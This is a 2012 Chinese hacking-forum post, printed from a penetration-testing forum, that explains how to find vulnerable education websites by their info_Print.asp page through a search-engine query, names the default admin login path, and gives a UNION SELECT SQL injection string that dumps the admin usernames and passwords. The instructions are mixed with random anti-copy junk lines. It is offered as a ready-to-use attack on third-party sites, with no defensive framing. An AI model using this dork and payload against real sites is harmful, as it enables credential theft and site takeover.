中国网络渗透测试联盟
标题:
某教育站打印页面漏洞批量webshell
[打印本页]
作者:
admin
时间:
2012-10-31 08:37
标题:
某教育站打印页面漏洞批量webshell
教育站打印页面漏洞
: M4 ?7 v- A1 d; j' ]* m
百度或google搜索 inurl:info_Print.asp?ArticleID=
" P( D$ o( D. N! W; f# X" h- m
默认后台:/ad_login.asp
' ?7 d4 b" {6 A) e
爆管理员密码:
; } p7 L! Q A5 O4 \1 V( H( S/ r
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
" V; H5 V* W( H
; l( k4 Q- L' ?% D! d) `$ j# {
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
/ P+ c4 r' H p' m) C ~
1 q: M* u: j9 W% a
作者:佚名
5 ^4 S9 ^$ Q) ~" N. }/ P( u
8 K* x% c& C/ u3 ^
" K' E7 X9 \8 L+ ^. a
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2